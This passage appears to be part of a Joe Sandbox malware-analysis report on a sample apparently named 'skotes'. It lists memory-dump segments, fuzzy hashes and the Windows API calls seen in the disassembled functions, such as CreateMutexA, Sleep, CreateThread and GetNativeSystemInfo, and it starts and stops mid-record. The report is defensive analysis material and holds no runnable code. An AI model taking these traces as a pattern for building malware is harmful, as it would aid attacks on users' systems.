                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 396266464-3459864372
                                                                                                                • Opcode ID: f1eba720b85feb692403fb4a3e68adf3e90881ca7897750ce99742b6f988d6fe
                                                                                                                • Instruction ID: fd0683e19545f97ffebc23e3ed149013a5ef88793156b1596e2e6e796bf7f7a8
                                                                                                                • Opcode Fuzzy Hash: f1eba720b85feb692403fb4a3e68adf3e90881ca7897750ce99742b6f988d6fe
                                                                                                                • Instruction Fuzzy Hash: 76312931B85144EBFB18AB78DD8DB5DBB62AB85320F24421EE0149B2D5E73D5D818722
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064,?), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: e440fab1b3e61150182549f803790c73bb9bc56d1a1023d54057d825a2767bde
                                                                                                                • Instruction ID: cca393778fad0d7ebaaf572e73dc3c7295ce636c97ccd01cb3835c1ffe668635
                                                                                                                • Opcode Fuzzy Hash: e440fab1b3e61150182549f803790c73bb9bc56d1a1023d54057d825a2767bde
                                                                                                                • Instruction Fuzzy Hash: 77E086107DE380F5F6183269588DB2D665997DA710F21046EE744CF1E0C96C69408367
                                                                                                                APIs
                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00788524
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InfoNativeSystem
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 1721193555-768041998
                                                                                                                • Opcode ID: 7aa9a3f05e58bc9d1464c5d67816ad108e078ce484c8287ffdfdced84b71d4f4
                                                                                                                • Instruction ID: 7ade04d70b88d8e5e598f8d34363af4ff7817d6b7a8e075a791fcc81dbab4a32
                                                                                                                • Opcode Fuzzy Hash: 7aa9a3f05e58bc9d1464c5d67816ad108e078ce484c8287ffdfdced84b71d4f4
                                                                                                                • Instruction Fuzzy Hash: FE511771D50248DBDB68FB68CD49BDDB775EB45310F904298E408A7282EF395E908B92
                                                                                                                APIs
                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,007B705B,?,?,00000000,00000000), ref: 007B7166
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Time$LocalSpecificSystem
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 2574697306-768041998
                                                                                                                • Opcode ID: 22a7b42995cfe1665f48d036e8ec65a5ac1a6a04b5a179216da8086b7a4841d1
                                                                                                                • Instruction ID: 949a83acedbabf76e4501f0a45142b894211bf89be3d4e8a323176d2eaf6c3e9
                                                                                                                • Opcode Fuzzy Hash: 22a7b42995cfe1665f48d036e8ec65a5ac1a6a04b5a179216da8086b7a4841d1
                                                                                                                • Instruction Fuzzy Hash: AD11187290410CABDB14DE99C885EDFB7BDAB88310F205262E511E2080EA34EA0ACB71
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 3472027048-768041998
                                                                                                                • Opcode ID: 5b820808767e599d94e6509a5eaf2a1307d005f2327fb6d5ac25b00ee6869e4e
                                                                                                                • Instruction ID: c9ba536f4a98a439cf964268f405b1dc2fab6aff6290158c7517b201fc8c8f12
                                                                                                                • Opcode Fuzzy Hash: 5b820808767e599d94e6509a5eaf2a1307d005f2327fb6d5ac25b00ee6869e4e
                                                                                                                • Instruction Fuzzy Hash: B7F0F971A40644E7CB007B7D9C0BB1E7B78EB07760F804748E4116B2D2EB3C1A0147D6
                                                                                                                APIs
                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00796D11
                                                                                                                • Sleep.KERNELBASE(00007530), ref: 00796D25
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateSleepThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4202482776-0
                                                                                                                • Opcode ID: 5527eeaf5dd6e3017d3964edf637b4a475d7daaf21f5dae96da8ae2c010fcdf2
                                                                                                                • Instruction ID: a9bb885ceb9aae38c32b9e24cda9694d8051817d18c121e9e573d5f2eb8126a0
                                                                                                                • Opcode Fuzzy Hash: 5527eeaf5dd6e3017d3964edf637b4a475d7daaf21f5dae96da8ae2c010fcdf2
                                                                                                                • Instruction Fuzzy Hash: E7D08CB07C1314B7FA2003213C0BF26AA209B0AF80F65684077483F0D086E8340047EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
